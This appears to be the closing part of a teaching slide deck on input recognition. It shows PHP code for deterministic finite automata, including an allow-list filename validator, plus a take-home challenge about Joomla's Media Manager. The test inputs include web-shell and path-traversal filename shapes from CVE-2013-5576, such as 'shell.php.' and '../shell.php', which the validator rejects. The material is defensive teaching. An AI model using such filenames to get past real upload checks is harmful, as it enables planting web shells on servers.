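    return in_array($state, $dfa['accept'], true);
}

// Slide 32's machine: S1 = even number of 0s seen so far (start and accept),
// S2 = odd number. Any character other than 0/1 has no transition.
$evenZeros = [
    'start'    => 'S1',
    'accept'   => ['S1'],
    'classify' => fn(string $c): string => $c,
    'delta'    => [
        'S1' => ['0' => 'S2', '1' => 'S1'],
        'S2' => ['0' => 'S1', '1' => 'S2'],
    ],
];

// Media filename language: one or more base characters, then exactly one
// dot, then one extension from the allow-list. The extension is encoded as
// a trie of states ("e:" + prefix read so far), so the allow-list is part of
// the language rather than a check bolted on afterwards. Matching is
// case-insensitive because the classifier lower-cases each character.
function filenameDfa(array $allowedExtensions): array
{
    $baseChars = str_split('abcdefghijklmnopqrstuvwxyz0123456789_-');
    $delta = [
        'start' => array_fill_keys($baseChars, 'base'),
        'base'  => array_fill_keys($baseChars, 'base') + ['.' => 'e:'],
    ];
    $accept = [];
    foreach ($allowedExtensions as $ext) {
        $prefix = '';
        foreach (str_split(strtolower($ext)) as $ch) {
            $delta['e:' . $prefix][$ch] = 'e:' . $prefix . $ch;
            $prefix .= $ch;
        }
        $accept[] = 'e:' . $prefix;
    }
    return [
        'start'    => 'start',
        'accept'   => $accept,
        'classify' => fn(string $c): string => strtolower($c),
        'delta'    => $delta,
    ];
}

foreach (['', '00', '1010', '0', '102'] as $s) {
    printf("even-zeros %-6s %s\n", "'$s'", runDfa($evenZeros, $s) ? 'accept' : 'reject');
}

// Constructed sample allow-list and filenames, including the CVE-2013-5576
// shapes. "shell.php" and "shell.php." fall off the extension trie at the
// "h" (no allowed extension starts with "ph"); "../shell.php" and ".png"
// have no transition out of the start state on "."; "x.pn" ends in state
// e:pn, which is not an accept state.
$media = filenameDfa(['bmp', 'gif', 'jpg', 'jpeg', 'png']);
foreach (['logo.png', 'Logo.JPEG', 'shell.php', 'shell.php.', 'shell.php.*', '../shell.php', 'a.b.png', '.png', 'x.pn'] as $name) {
    printf("filename   %-14s %s\n", $name, runDfa($media, $name) ? 'accept' : 'reject');
}
```

Only logo.png and Logo.JPEG are accepted; every other sample name, including the trailing-dot names from the CVE, is rejected before any later code sees an "extension". That is the design point of the recognizer: there is no intermediate value such as $format = '' for a later check to misinterpret, because the machine answers accept or reject and nothing else. Widening the language (allowing spaces as makeSafe does, for instance) means adding those characters to $baseChars, not adding a second validation step.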
• 33. Take-home Challenge
What modifications can you make to Joomla 3.1.4 in order to create a recognizer for the Joomla Media Manager component, such that it recognizes valid filenames and only allows processing of those?

• 34. Shown:
● A suggested approach for the Skill Builder
● Creating fundamental concept trees to help you and others
● An example thought process through a CVE
● Revisited ideas related to the CVE

• 35. Thanks for listening
Image courtesy of Wikipedia